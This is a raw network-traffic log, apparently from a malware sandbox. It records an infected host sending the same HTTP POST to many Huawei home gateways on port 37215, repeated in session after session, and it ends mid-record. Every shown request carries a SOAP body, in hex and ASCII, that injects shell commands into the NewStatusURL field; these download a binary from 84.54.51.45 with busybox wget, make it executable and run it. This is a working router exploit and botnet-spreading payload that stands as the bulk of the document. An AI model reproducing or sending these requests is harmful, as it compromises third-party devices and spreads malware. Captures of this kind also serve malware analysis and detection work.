78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1255192.168.2.1552324197.130.43.5637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.729603052 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1256192.168.2.1555156197.180.193.15637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.729603052 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1257192.168.2.1543832197.66.203.18237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.729604959 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1258192.168.2.1536210197.134.99.12037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.729634047 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1259192.168.2.1538512197.31.86.20737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.729693890 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1260192.168.2.1554298197.122.86.13337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.729697943 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1261192.168.2.1548410197.165.239.14937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.729708910 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1262192.168.2.1545764197.242.134.17237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.729732037 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1263192.168.2.1546988197.72.4.2437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.729770899 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1264192.168.2.1542034197.158.29.8737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.729773998 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1265192.168.2.1545270197.176.40.18637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.729798079 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
